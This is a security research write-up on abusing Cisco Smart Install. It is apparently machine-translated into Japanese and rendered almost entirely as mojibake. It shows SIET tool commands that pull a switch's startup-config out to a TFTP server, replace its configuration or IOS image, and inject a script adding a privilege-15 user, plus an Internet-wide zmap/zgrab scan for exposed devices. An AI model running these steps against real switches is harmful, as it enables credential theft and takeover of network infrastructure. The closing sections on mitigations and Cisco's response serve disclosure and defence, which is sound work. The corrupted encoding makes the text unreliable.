äžæ¥ã®è¯ãæéïŒ Digital Securityã®å€æã€ã³ã¿ãŒã³ã·ããã§ææ¡ãããŠããéåžžã®ãåŠçããããã¯ãæ¬æ Œçãªã»ãã¥ãªãã£ç 究ã«çºå±ããããšãæ³åããããšããäžå¯èœã§ããã
ãã¯ãããžèªäœãããŒããŠã§ã¢èŠä»¶ãªã©ã«ã€ããŠã¯ããã¡ããã補é å
ã®Webãµã€ãïŒ
Cisco Smart InstallïŒã§èªãããšãã
å§ãããŸã ã
ç°¡åã«èšããšããSmart Installã¯ãæ°ãããããã¯ãŒã¯ã¹ã€ããã®çŸåšã®ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã€ã¡ãŒãžãæåã«æ§æããã³ããŠã³ããŒãããããã»ã¹ãèªååã§ãããã¯ãããžã§ãã ã€ãŸãããç®±ããåºããŠãããã«åãåºãããæ°ããæ©åšãããã«æä¹
çãªå Žæã«èšçœ®ã§ãã管çè
ã®é¢äžãªãã«åææäœã«å¿
èŠãªãã¹ãŠã®ããŒã¿ããããã¯ãŒã¯çµç±ã§é
ä¿¡ãããŸãã ãã®éçšã§ããã¯ãããžã¯æ§æãå€æŽããããšãã«ãæ§æãããã¯ã¢ããããŸãã
ãããã£ãŠããããäœããã®åœ¢ã§æ©èœããããã«ããã®ãã¯ãããžãŒã¯ããã©ã«ãã§æå¹ã«ãªã£ãŠããŸãã ãã®ãã¯ãããžãŒã䜿çšãããŠããããã€ã¹ã®å®å
šãªãªã¹ãã¯ã補é å
ã®Webãµã€ãã§èŠãããšãã§ããŸãïŒ
Cisco Smart Install Supported devices ã
以äžã§èª¬æãããã¹ãŠã®æ»æããã¯ã©ã€ã¢ã³ããã«åœ±é¿ããããšãç解ããããšãéèŠã§ãã
ãã¡ãããæåã®ããšã¯ãçŸåšã®Cisco Smart Installã€ã³ãã©ã¹ãã©ã¯ãã£ã¢ãã«ãåäœæããããšã§ãããæåã¯ããä»®æ³ãç°å¢ïŒ
ããšãã°gns3 ïŒã§ãããè¡ãããšãã§ãããšãã確信ããããŸãããããã®ã¢ã€ãã¢ããSmart InstallããµããŒãããããã€ã¹ã€ã¡ãŒãžã®æ€çŽ¢ã«é·ãé倱æããŸããæåŠããªããã°ãªããŸããã§ããã
ããã§ã±ãŒã¹ãæ¬åœã«åœ¹ç«ã¡ãŸããã å¶ç¶ã«ïŒ1ã€ã®ãããžã§ã¯ããæªå®æã®ãŸãŸã§ïŒèªç±ã«äœ¿ããããã«ãªã£ãã®ã§ããã¯ãããžãŒãç 究ããããã®ãã¹ãç°å¢ãåæ§ç¯ããã®ã«é©ããæ©åšãèŠã€ããŸããã
ãã¹ãç°å¢ã®ã¬ã€ã¢ãŠããšæ§æ
- ããã£ã¬ã¯ã¿ãŒãïŒ1ïŒCisco 2901ïŒCISCO2901 / K9ïŒ15.0ïŒ1rïŒM15
- ãã£ã¬ã¯ã¿ãŒïŒ2ïŒCisco Catalyst 3750ïŒWS-C3750X-48PïŒ15.2ïŒ4ïŒE2
- ãClient1ãCisco Catalyst 2960ïŒWS-C2960-48TT-LïŒ15.0ïŒ2ïŒSE10
- Client2 Cisco Catalyst 2960SïŒWS-C2960S-48TS-LïŒ15.2ïŒ2aïŒE
- ãTFTPãµãŒããŒããã¹ã¯ãããWindows 7 x64ãTFTPd64
- ã³ã³ãœãŒã«ãã¹ã¯ãããWindows 7 x64ãcom1ãPuTTy
- ãããŒãããã¯ãããŒãããã¯Windows 7 x64ãCentOS 7 x64ãWireSharkïŒ2.0.5ïŒ
Smart Installã«é¢ãããDirectorãæ§æã®ãã©ã°ã¡ã³ãïŒ
vstack group custom c2960Lan product-id image tftp://192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar config tftp://192.168.1.5/c2960-lanbase_config.txt match WS-C2960-48TT-L <- Group based on Product ID vstack group custom c2960SLan product-id image tftp://192.168.1.5/c2960s-universalk9-tar.152-2a.E1.tar config tftp://192.168.1.5/c2960SLan_confg match WS-C2960S-48TS-L <- Group based on Product ID ! vstack dhcp-localserver LANPOOL address-pool 192.168.1.0 255.255.255.0 file-server 192.168.1.5 default-router 192.168.1.1 ! vstack director 192.168.1.1 vstack basic vstack startup-vlan 1 vstack backup file-server tftp://192.168.1.5/
äžèšã®æ§æãããããããã«ã補åIDã«ããããã€ã¹ã°ã«ãŒãåã䜿çšããŸããã
ãã¯ã©ã€ã¢ã³ãããããŠã³ããŒãããŠããã£ã¬ã¯ã¿ãŒãã«ç»é²ãããšã次ã®å³ã衚瀺ãããŸãã
Director
æåã®è©Šã¿
äœããã®çç±ã§ããŸã£ããæ°ãããããã¯ãå匷ããåã«ãã«ã€ã¹ã»ãã£ãã«ã®ãäžæè°ã®åœã®ã¢ãªã¹ãã®äžæ»
ã®äœåããã®è¡ããçãè©©ãèªãããã«ãŠãµã®ã«é Œããšç§ã®èšæ¶ã«çŸããŸãã
ã©ãããå§ããŸãããYouräžïŒ çœãããã«å°ããã
æåããå§ããŠããçæ§ã¯å³beginningã«èšããŸãããããããŠæåŸã«éãããŸã§ç¶ããŸãã ããããããŠïŒ ïŒBoris Zakhoderã«ãã翻蚳ïŒç§ã¯ãæåãããå§ããããšããŸãã ã·ã¹ãã ã暪ããèŠãã ãã§ãã
ã©ãããããããDirectorsããããã¯ãŒã¯ã«æ¥ç¶ããDHCPçµç±ã§ãããã¯ãŒã¯ãã©ã¡ãŒã¿ãååŸããŸãã Wiresharkãèµ·åãããããã¯ãŒã¯ã«ãŒãã«å±ããããã¯ãŒã¯ãã±ããã芳å¯ããŸãã
ãã¡ãããç§ã¯äœãé¢çœããã®ãèŠãŸããã§ããã ããã§ãã±ãŒã¹ãåã³ä»å
¥ããŸããããããã¯ãŒã¯ã¯ã€ã€ããã¯ã©ã€ã¢ã³ã2ãã«æž¡ãããæ¹æ³ã奜ãã§ã¯ãããŸããã§ããã åæããåŸããå®æ§çã«ãã³ãŒããæ·ããã¹ã€ããããªã³ã«ããŸããã
ãã¯ã©ã€ã¢ã³ã2ãããDirectorããããããã¯ãŒã¯ãã©ã¡ãŒã¿ãåä¿¡ãããšããããŒããã£ã¹ããã±ããã芳å¯ããŸãããããã¯ãŒã¯èšå®ã«å ããŠãç¹ã«ãDirectorããããã¯ãŒã¯ã®ç¹å®ã®ãã©ã¡ãŒã¿ãç¹ã«ããã¯ã¢ããæ§æãã¡ã€ã«ã®å Žæãå«ãDHCPèŠæ±ãžã®å¿çã§ãã
ãããæ°åã§ãçºèŠããããè匱æ§ããæªçšããã¢ã«ãŽãªãºã ã圢æãããŸããã
- ãSmart InstallãããŒãïŒtcp 4786ïŒã®å¯çšæ§ã«ã€ããŠãããã¯ãŒã¯ãã¹ãã£ã³ããŸãã
- ãããŒããã£ã¹ããã±ãã-èŠã€ãã£ãããã€ã¹ã®ãããã¯ãŒã¯ãã©ã¡ãŒã¿ã®ãªã¯ãšã¹ããäœæããŠéä¿¡ããŸãïŒDHCPãªã¯ãšã¹ãã§ãã®ããã€ã¹ã®MACã¢ãã¬ã¹ã眮ãæããŸãïŒã
- èŠã€ãã£ãããã€ã¹ã®ããã¯ã¢ããæ§æã®å Žæã«é¢ããæ
å ±ãå«ããDirectorãããã®ãããŒããã£ã¹ãå¿çãåãå
¥ããŸã
- TFTPãµãŒããŒããããŒã«ã«ãã£ã¹ã¯ã«æ§æãã¡ã€ã«ããããŠã³ããŒããããŸãã
ãæ£åžžã«æ©èœãããã¹ããŒãã€ã³ã¹ããŒã«ã§ãããã¯ãŒã¯ã«æ¥ç¶ã§ããå Žåããã¯ã©ã€ã¢ã³ããæ§æã®ãã¹ãŠã®ããã¯ã¢ããã³ããŒãåéãããããã¯ãŒã¯ããããžãèŠã€ããéãè¯ããã°ããããã¯ãŒã¯æ©åšç®¡çè
ã®ãã¹ã¯ãŒããååŸããããšã¯é£ãããããŸããã
ããã€ã¹æ§æãã¡ã€ã«ã®çœ®ãæã
次ã«ãã³ãã³ããå
¥åããŠæ§æãšãœãããŠã§ã¢ã®æŽæ°ã匷å¶ãããšãã«ããDirectorããããClientãã«éä¿¡ããããããã¯ãŒã¯ãã±ãããåéããããšã«ããŸããã
ããŒãäžã®ãã¹ãŠã®ãããã¯ãŒã¯ãã©ãã£ãã¯ãããªãã¹ã³ãããããã«ãã·ã¹ã³ã«ã¯ã»ãã·ã§ã³ã®ç£èŠãšããåªããããŒã«ããããŸãã
ãDirectorãã§ããClient 1ããæ¥ç¶ãããŠããããŒãããããŒãããã¯ãæ¥ç¶ãããŠããããŒããžã®ãããã¯ãŒã¯ãã©ãã£ãã¯ã®ããã©ãŒãªã³ã°ããæ§æããŸãã
ã¢ãã¿ãŒã»ãã·ã§ã³1ãœãŒã¹ã€ã³ã¿ãŒãã§ã€ã¹FastEthernet0 / 1
ã¢ãã¿ãŒã»ãã·ã§ã³1å®å
ã€ã³ã¿ãŒãã§ã€ã¹FastEthernet0 / 2Wiresharkãèµ·åãããããã¯ãŒã¯ã«ãŒãã«å±ããããã¯ãŒã¯ãã±ããã芳å¯ããŸãã
ãDirectorãã§ããClient 1ãã®æ§æã匷å¶çã«æŽæ°ããã³ãã³ããé çªã«å®è¡ããŸãã
- #vstack download-config tftpïŒ//192.168.1.5/c2960Lan_confg 192.168.1.2 NONE startup- ããã€ã¹ãåèµ·åããã«;
- #vstack download-config tftpïŒ//192.168.1.5/c2960Lan_confg 192.168.1.2 NONE startup reload- ããã«ããã€ã¹ãåèµ·åããŸãã
- #vstack download-config tftpïŒ//192.168.1.5/c2960Lan_confg 192.168.1.2 NONEã¹ã¿ãŒãã¢ãããªããŒãïŒ23:28ïŒ -ããã€ã¹ã®åèµ·åã®é
延ïŒ23æé28åïŒã
vstack download-configã³ãã³ãã®æ§æãšèšå®ããã³ãã³ããæ¯èŒãããšããã¯ã©ã€ã¢ã³ãã¹ã€ããã®ãã¹ã¯ãŒãããã©ã¡ãŒã¿ãŒããNONEãã§ããããšãããããŸãã ååãšããŠã次ã®çç±ã«ãããä»»æã®æåã·ãŒã±ã³ã¹ã䜿çšã§ããŸããããã¹ã¯ãŒãã¯ãSmart Install察å¿ã§ã¯ãªãã¹ã€ããã«ã®ã¿å¿
èŠã§ãã ãã§ã«Smart Installãããã¯ãŒã¯ã«ããã¹ã€ããã«ã¯å¿
èŠãããŸããã-ã·ã¹ã³ã®Webãµã€ãã®èª¬æããã
é¢é£ãããããã¯ãŒã¯ãã±ããïŒ
ãœã±ããããã±ãŒãžã§Python 2.7ã䜿çšããããšã§å€§ããªæåãæåŸ
ããããšãªããã©ããããããããã¯ã©ã€ã¢ã³ã1ãã«åããããã¯ãŒã¯ãã±ããã圢æããŠéä¿¡ããããšããŸããïŒã©ãããããããDirectorãã®ãéåžžã®ãããŒãã«ãã©ââãŒãªã³ã°ãªãã§æ¥ç¶ããŸããïŒã
ãã¯ã©ã€ã¢ã³ã1ãã¯ãããã£ã¬ã¯ã¿ãŒãããã³ãã³ããåä¿¡ãããšããšåãæ¹æ³ã§ã³ãã³ããåŠçããŸããïŒ
ä»»æã®æ§æãã¡ã€ã«ããã¯ã©ã€ã¢ã³ããã«ã¢ããããŒãããŠããããå®å
šã«å¶åŸ¡ã§ããããšãããããŸããã 確ãã«ãçŸåšã®æ§æã¯å€±ããããããçŸæç¹ã§ã¯ããµãŒãã¹æåŠãã«ãããŸããã
ç 究ã®éçšã§ããã¹ãŠã®æ»æãå®è¡ããããŒã«ãäœæããå¿
èŠãããããšãæããã«ãªããŸããã PythonãèšèªãšããŠéžæãããŸããã çµæã¯
githubã«æçš¿ãããŸãã
ããã€ã¹ã®èšå®ã眮ãæããã«ã¯ãèšå®ãã¡ã€ã«ãå¿
èŠã§ãããèšå®ãã¡ã€ã«ããªãå Žåã¯è©ŠããŠã¿ããå ŽåããŠãŒãã£ãªãã£ã¯ããã©ã«ãèšå®ãäœæããtelnetçµç±ã§ããã«ã¢ã¯ã»ã¹ã§ããããã«ããŸãã
sudo python siet.py - -i 192.168.1.4
IOSã€ã¡ãŒãžã®çœ®æ
ãã£ã¬ã¯ã¿ãŒãšã¯ã©ã€ã¢ã³ãéã§äº€æããããããã¯ãŒã¯ãã±ããã®ç£èŠãç¶ç¶ããŸãã ã¢ã€ãã¢ãæµ®äžããŸããïŒããã€ã¹æ§æãã¡ã€ã«ã眮ãæããããšãã§ãããããªãiOSå
šäœã«æ°ä»ããªãã®ã§ããã ãã®ãããã³ã«ã¯ãé¢é£ããæ©èœãæäŸããŸãã
- ïŒvstack download-image tar tftpïŒ//192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar 192.168.1.2 NONE override reload- ããã«ããã€ã¹ãåèµ·åããŸãã
- ïŒvstack download-image tar tftpïŒ//192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar 192.168.1.2 NONEã¯23:15ã«ãªããŒãããªãŒããŒã©ã€ãããŸã -ããã€ã¹ã®åèµ·åãé
延ããŸãïŒ23æé15åïŒã -ããã€ã¹ã®åèµ·åã®é
延ïŒ23æé15åïŒã
é¢é£ãããããã¯ãŒã¯ãã±ããïŒ
ãæ»æãã©ããããããããããã®ãã±ãããéä¿¡ããå®éšã¯ãåã®ãã®ãšåæ§ã«çµäºããŸãããIOSãæŽæ°ããã³ãã³ããããã£ã¬ã¯ã¿ãŒãããæ¥ãå Žåããã¯ã©ã€ã¢ã³ã1ãã¯åãããã«åäœããŸããã
ãããŠãSmart Installã䜿çšãããã©ããããããã¯ãŒã¯ã«ãDirectorããšãClientããååšãããã©ããã¯é¢ä¿ãªããšããããšãããããŸããã ãããã³ã«ã³ãã³ãã¯ãšã«ããåŠçãããŸãã
çè«çã«ã¯ãå¿
èŠãªãã¹ãŠã®ãããã¯ããŒã¯ãã§æºããããIOSã€ã¡ãŒãžãæºåãããããã¯ãŒã¯ã¹ã€ããã«ãã¢ããããŒããããããšãå¯èœã§ãã
ãã®ããã«ããŠãæ°ããCisco 2960ã¹ã€ããã®æ§æãšIOSããç®±ããåºããŠãæŽæ°ããããšã«æåããŸããã
Smart Installã®ãã¯ã©ã€ã¢ã³ããã®èŠä»¶ãæºãããã¹ãŠã®ããã€ã¹ã¯ããDirectorãããªããŠãæ§æããã³ãœãããŠã§ã¢ãæŽæ°ããã³ãã³ãã®åœ±é¿ãåããããããšãããããŸããã
次ã®ã³ãã³ãã䜿çšããŠãã€ã¡ãŒãžã®æŽæ°ãè©Šã¿ãããšãã§ããŸãã
sudo python siet.py âu âi 192.168.1.3
ã¢ããã°ã¬ãŒãããã»ã¹äžã«ãiOSã€ã¡ãŒãžãã¡ã€ã«ãèŠæ±ãããŸãã iOSãã¡ãŒã ãŠã§ã¢ã«ã³ãŒããåã蟌ãæ¹æ³ã«ã€ããŠã¯ã
ãã¡ããã芧ãã ãã ã
ããã€ã¹ããæ§æãã¡ã€ã«ãçã
åè¿°ã®äœæ¥ãå®äºããæç¹ã§ãã€ã³ã¿ãŒã³ã·ããããã°ã©ã ã¯äžè¬çã«å®äºããããã«æããŸããã ç 究ã®äž»é¡ãç 究ãããŸãã è匱æ§ãèŠã€ããããããã¯ãŒã¯ã¹ã€ãããžã®äžæ£ã¢ã¯ã»ã¹ã«äœ¿çšãããŸããã
ããããã€ã³ã¿ãŒã³ã·ãã
ãããŒãžã£ãŒã®GrrrnDog ïŒç¹å¥ãªãããããšããïŒã¯ãããã€ã¹ããæ§æãçŽæ¥ãååŸãããæ©äŒãèŠã€ããããã«ããããã³ã«ã®ç 究ãç¶ããå¿
èŠããããšç¢ºä¿¡ããŸããã
æ§æãèšé²ãããšãïŒãã¯ã©ã€ã¢ã³ããã³ã³ãœãŒã«ã§
ã¡ã¢ãªã³ãã³ãã
æžã蟌ã ïŒãŸãã¯ããã£ã¬ã¯ã¿ãŒãããªããŒããããšãã®ããã€ã¹ã®ããã¯ã¢ããã³ããŒã®èªåäœæã«å°å¿µãããã¹ããŒãã€ã³ã¹ããŒã«ãæè¡ã«èå³ããããŸããã
ã¯ã©ã€ã¢ã³ã2ã³ã³ãœãŒã«ã§ãæ§æãäžæ®çºæ§ã¡ã¢ãªïŒæžã蟌ã¿ã¡ã¢ãªïŒã«æžã蟌ãã³ãã³ããæå®ããŸãã
æ§æã®ããã¯ã¢ããã³ããŒãäœæããããã®ãDirectorãããã®ãããã¯ãŒã¯ããã±ãŒãžã«ã¯ã3ã€ã®ãcopyãã³ãã³ããå«ãŸããŠããŸããã
opy tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV2 to flash:SW_EXT-a8b1.d464.2480.tmp
opy nvram:startup-config to tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV2
opy flash:SW_EXT-a8b1.d464.2480.tmp to tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV1
以åã®æ§æããã¯ã¢ãããä¿åãããŠããããšãããããŸãã
ãããã¯ãŒã¯ãã±ããã«ã³ãã³ãã®ãããã«ç°ãªãã·ãŒã±ã³ã¹ãæ¿å
¥ããèªæãé¿ããããšã¯ã§ããŸããã§ãããããšãã°ã次ã®ãšããã§ãã
configure terminal username cisco privilege 15 secret 0 cisco exit
ããããæ®å¿µãªããããã³ããŒãã³ãã³ããé€ããŠããã¯ã©ã€ã¢ã³ããã¯äœãèªèããŸããã ãæ確ã«æ©èœããããããã¯ãŒã¯ãã±ãããã³ã³ãã€ã«ããéçšã§ãIOSããŒãžã§ã³ã15.0以äžã®Cisco Catalystã¯ã©ã€ã¢ã³ãã§ã¯ãcopy to flashã³ãã³ããæåã®ã³ãã³ãã§ãªããã°ãªããªãããšãå€æããŸããã
ãã®çµæããã¯ã©ã€ã¢ã³ããäžã®TFTPãµãŒããŒãžã®æ§æã®è»¢éãéå§ãããã±ããã¯ã2ã€ã®ã³ãã³ãã§æ§æãããŸãã
copy nvram:startup-config flash:/config.text copy nvram:startup-config tftp://192.168.1.5/client.conf
ãããã£ãŠãåé¡ã¯å°ãããŸãŸã§ããã®ãããªããã±ãŒãžããŠãŒãã£ãªãã£ã«éä¿¡ããæ©èœãè¿œå ããŸãããããã¯æ£åžžã«è¡ãããŸããã ããŒã ïŒ
sudo python siet.py -g -i 192.168.0.4
æ§æãã¡ã€ã«ãããã€ã¹ã«ã³ããŒããå¿
èŠã«å¿ããŠç·šéïŒããšãã°ã管çè
ã«èªåãè¿œå ïŒããŠããªã¢ãŒãããã€ã¹ã«é©çšããããšãã§ããŸãã
ããçšåºŠã®æäœçµéšã®åŸãå¯èœãªéãå€ãã®ç¹æš©ãŠãŒã¶ãŒãã¹ã¯ãŒããåéããããã«ãå€æ°ã®ããã€ã¹ããæ§æãã¡ã€ã«ã倧éã³ããŒããããšã圹ç«ã€å ŽåãããããšãããããŸããã æ®å¿µãªããããŠãŒãã£ãªãã£ã®æåã®ããŒãžã§ã³ã¯ããããã£ãããšè¡ããã·ã³ã°ã«ã¹ã¬ããtftpãµãŒããŒã¯å€§éã®ãã¡ã€ã«ã®æµå
¥ã«å¯ŸåŠã§ããŸããã§ããã
ãŠãŒãã£ãªãã£ã«ãã«ãã¹ã¬ãããè¿œå ãããŸãããããããŸã§ã®ãšããå®å
šã«ã¯ãã¹ããããŠããŸããã
sudo python SIET2/siet2.1.py âl list.txt âg
ããã§ãlist.txtã¯ãããŒã4786ãéããŠããIPã¢ãã¬ã¹ã®ãªã¹ããå«ããã¡ã€ã«ã§ãããããããgrepã«ä»»ããŸãã
ããªãã¯ããããããŸããïŒ
ãµãŒãã¹æåŠãåŒãèµ·ããã ãã§ãªããããã€ã¹ã®æ§æãçã¿ãçè«çã«ã¯ãããä»ããŠãã«ã¢ã¯ã»ã¹ãååŸããå¯èœæ§ãçºèŠããåŸããéçãã§èŠã€ããããããã€ã¹ã®æ°ãèŠã€ããããã«ã€ã³ã¿ãŒããããã¹ãã£ã³ããããšã«ããŸããã
tcp 4786ããŒãã§ã®åçŽãªã¹ãã£ã³ã¯å®å
šã«å®¢èŠ³çã§ã¯ãªãããïŒããã£ã¬ã¯ã¿ãŒãã«ããã®ããŒãããããŸãïŒããã®ãããªããã€ã¹ãèå¥ããæ¹æ³ãå¿
èŠã§ããã
ãã®ç®çã®ããã«ããµãŒãã¹ã®ããŒãžã§ã³ã決å®ããnmapâ samplesâïŒhttps://svn.nmap.org/nmap/nmap-service-probesïŒã¯å®å
šã«é©åã§ãã
match cisco-smartinstall m|^\0\0\0\x04\0\0\0\0\0\0\0\x04\0\0\0\x04\0\0\0\x01| p/Cisco Switch Smart Install/ d/switch/ o/IOS/ cpe:/o:cisco:ios/a
ãã®åŸãããã¯å°ãããã€ã³ã¿ãŒãããã¹ãã£ã³ãæŽçããæ€åºãããããã€ã¹ã«ãµã³ãã«ãéä¿¡ããå¿çãèšé²ããŸãã ããã¯ãzgrabãšçµã¿åããããšzmapã䟿å©ã«ãªãå Žæã§ãã
zmap -r 10000 -p 4786 -o - | ./zgrab -timeout=10 -port=4786 -data probe.txt -output-file=banners.json
ãã®çµæã251801å°ã®ããã€ã¹ãèŠã€ãããŸããã ãã ããæ®å¿µãªããããã®nmapãã¹ãããã¹ãŠã®ããã€ã¹ã«é©ããŠãããšãã確å®æ§ã¯ãªãããããã®çµæã¯æ£ç¢ºãšã¯èšããŸããã ããŒã4786ãéããŠããçŽ900äžã®ããã€ã¹ãèŠã€ãããŸãããããããã®ã»ãšãã©ã¯ã«ãŒã¿ãŒã§ããããããã®æ»æã®åœ±é¿ãåããŸããã
ããã€ã¹ã§ã³ãã³ããå®è¡ãã
ç§ãã¡ãçºèŠããæ©äŒã«æ°ä»ããåŸãæ
å ±ã»ãã¥ãªãã£ã«é¢ããäŒè°ã§ããZeroNight 2016ã§è¡ãããäœæ¥ã«ã€ããŠè©±ãããšã«ããŸããã
äŒè°ã®ã¬ããŒããæºåããéçšã§ããSmart Installããã¯ãããžãŒã®èª¬æãèšèŒãããã·ã¹ã³ã®Webãµã€ãã®ããŒãžã«å床ã¢ã¯ã»ã¹ããéçºè
ãæ°ããæ©èœãè¿œå ããããšãçºèŠããŸãã-ãSmart Installããããã¯ãŒã¯äžã®æ°ããããã€ã¹ã®æ£åžžãªåæååŸã«å®äºããå¿
èŠãããã³ã³ãœãŒã«ã³ãã³ããæå®ããæ©èœ ãããã®ã³ãã³ãã¯ããããããã¡ã€ã«åœ¢åŒã§çºè¡ãããŸã ãã€ã³ã¹ããŒã«åŸã¹ã¯ãªãããã
ãã®ãããªãã¡ã€ã«ã®äŸïŒ
Cisco Webãµã€ãã§æäŸïŒïŒ
"sdm prefer degault" "vlan 12" "name TEST" "exit"
æããã«ããã¡ã€ã«ã®åè¡ã¯ãã¹ã€ããã§ç«¯æ«æ§æã¢ãŒãã«å
¥ã£ãåŸã«å
¥åãããäžé£ã®ã³ãã³ãã§ãïŒç«¯æ«ã®æ§æïŒã ãã®ã¢ã€ãã¢ã¯ã2è¡ç®ã®çµããã«ãåºå£ããååšããããšã«ãã£ãŠä¿ãããŸãã
ãã®æ°ããæ©èœãç 究ããã«ã¯ãCisco Catalyst 3750ïŒWS-C3750X-48PïŒãIOS 15.2ïŒ4ïŒE2ãããã£ã¬ã¯ã¿ãŒããšããŠæ¡çšããå¿
èŠããããŸããã èšå®ã¯å€ããDirectorãããã³ããŒããããc2960SLanãã°ã«ãŒãã®èšå®ã»ã¯ã·ã§ã³ã«æ¬¡ã®è¡ãè¿œå ãããŸããã
script tftp://192.168.1.5/c2960-lanbase_post_install.txt
ãã¡ã€ã«ãäœæããŸã-ãã€ã³ã¹ããŒã«åŸã¹ã¯ãªãããïŒ
c2960-lanbase_post_install.txt: "interface GigabitEthernet1/0/1" "desc TEST" "exit" "username ccc privilege 15 secret 0 cisco" "exitâ
ãã¯ã©ã€ã¢ã³ã2ãã®èšå®ããæ¶å»ããïŒæ¶å»ã³ãã³ããæžã蟌ã¿ïŒãåèµ·åããŸãã IOSãæŽæ°ããäžè¬çãªæ§æãããŠã³ããŒãããæ¢ç¥ã®ããã»ã¹ãšãšãã«ãc2960-lanbase_post_install.txtãã¡ã€ã«ã®å
容ãèªã¿åãããããã«æžã蟌ãŸããã³ãã³ããå®è¡ãããŸãã
ãDirectorããããClient 2ããåä¿¡ãããããã¯ãŒã¯ãã±ããã¯æ¬¡ã®ããã«ãªããŸãã
ãã¡ã€ã«ããã³ãã³ããããŠã³ããŒãããŠå®è¡ããã«ã¯ããã¯ã©ã€ã¢ã³ããããããã¯ãŒã¯ãã±ããã§ãã®ãã¡ã€ã«ã®å Žæã«é¢ããæ
å ±ã®ã¿ãéä¿¡ããã ãã§ååã§ããããšãããããŸããïŒæ®ãã¯ããŒããã§åããããŸãïŒã
ãããªãã¯ãã¯ãcccãŠãŒã¶ãŒãšããŠããã€ã¹ã«ãã°ã€ã³ã«å€±æãããšéåžžã«å°è±¡çã«èŠããŸããããããã¯ãŒã¯ãã±ããããã¯ã©ã€ã¢ã³ããã«éä¿¡ããåŸãæ¿èªãçªç¶ããã¹ãããŸãã
èŠã€ãã£ãå¶éïŒ
- ãã¯ã©ã€ã¢ã³ããã®iOSããŒãžã§ã³ã¯15.2以äžã®ã¿ã§ãïŒ15.0ã§-åäœããªããªããŸãïŒã
- ã¹ã€ããã¯ã次ã®åèµ·åãŸã§ãã®ãããªãã±ããã1ã€ã ãåãå
¥ããããšãã§ããŸãã
- æ§æã®ä¿åã³ãã³ãïŒ "do-exec wr"ïŒãã¹ã¯ãªããã«å«ããããšã¯ã§ããŸãã-ç·æ¥åèµ·åã
ä¿è·ã®æ¹æ³
ç§ã®æèŠã§ã¯ããã®åé¡ã解決ããæãç°¡åãªæ¹æ³ã¯ãå¿
èŠã«å¿ããŠãããã³ã«æ©èœãå«ããéãã°ã«ã¹ã€ããããè¿œå ããããšã§ãã ãããã£ãŠãããŒãã¿ããã€ã³ã¹ããŒã«ãã®æŠå¿µã«éåããããšã¯ãããŸããã ãããã³ã«ã®æ©èœã䜿çšããªããŠãŒã¶ãŒã¯ãããã€ã¹ã䟵害ããŸããã
ãã§ã«ãªãªãŒã¹ãããŠããããã€ã¹ã§ã¯ãSmart Installã䜿çšããªãå Žåã¯ç¡å¹ã«ããå¿
èŠããããŸãã ãããè¡ãã«ã¯ãããã€ã¹ã®ã³ã³ãœãŒã«ã§no vstackã³ãã³ãã䜿çšããŸãã ãã®åŸãshow vstack configã³ãã³ãã®åºåã¯æ¬¡ã®ããã«ãªããŸãã
switch
ããã§ããCisco Smart Installãã¯ãããžãŒãé©åã«äœ¿çšããããšã«ãããå€æ°ã®ããã€ã¹ã§æ§æããããããã¯ãŒã¯æ©åšãå¹æçã«ç®¡çã§ããŸãã ãã®å¹çã¯ãããŸããŸãªå»ºç©ãå°åã«åæ£ãããããã¯ãŒã¯ã管çããå Žåã«ç¹ã«é¡èã§ãã
æšæºã®æ©åšæ§æã«ã¢ã¯ã»ã¹ãªã¹ãèšå®ãå«ããããšã§ãäžèšã®æ»æãã身ãå®ãããšã¯ã»ãŒ100ïŒ
å®å
šã§ããããã«ããããDirectorãã®IPã¢ãã¬ã¹ãæ確ã«ç€ºãããSmart InstallããŒãã§ãããã¯ãŒã¯ãã±ãããåä¿¡ã§ããŸãïŒtcp 4786 ïŒ
ãã®èšäºã§èª¬æãããã¹ãç°å¢ã®ãã¯ã©ã€ã¢ã³ããæ§æã®äŸã瀺ããŸãã
interface Vlan1 ip address dhcp ip access-group 101 in ! access-list 101 permit tcp host 192.168.1.1 192.168.1.0 0.0.0.255 eq 4786 access-list 101 permit tcp any any neq 4786 access-list 101 permit udp any any access-list 101 deny ip any any !
ãã³ããŒã®åå¿
èŠã€ãã£ãåé¡ã«ã€ããŠã·ã¹ã³ã«å ±åããåŸã 次ã®ãããªå¿çããããŸããã
ãã ãã培åºçãªåæãšå
éšã®è°è«ã®çµæãããã¯è匱æ§ã§ã¯ãªããšå€æããŸããã
Cisco IOSãIOS XEããŸãã¯Smart Installæ©èœèªäœã§äœ¿çšãããŸãããèšèšã«ããèªèšŒãå¿
èŠãšããªãSmart Installãããã³ã«ã®æ£åœãªæ©èœã®èª€çšã§ããå瀟ã¯ãæœåšçãªå±éºããŠãŒã¶ãŒã«èŠåããã»ã¯ã·ã§ã³ãè¿œå ããããšã«ãã
ããŠã§ããµã€ãã®ãããã³ã«æ
å ±
ãæŽæ°ããŸããã
ãããŠã3ãæåŸã圌ãã¯ãã®ç 究ã«æè¬ã®æãè¡šæããåã³å
¬ã«
åé¡ãå ±åããŸãã ã
ããšãããšæè¬
ãã®åºçç©ã¯ã
劚害è¡çºãšã®ã³ã©ãã¬ãŒã·ã§ã³ã®çµæã§ãã èŠã€ãã£ãè匱æ§ã®æªçšã«é¢ãããã¹ãŠã®è³æãæžããã®ã¯åœŒã§ããã
ç¹°ãè¿ããŸãããã€ã³ã¿ãŒã³ã·ããã®
GrrrnDogã®ãããã«ç¹å¥ãªæè¬ãè¡šæããããšæããŸãã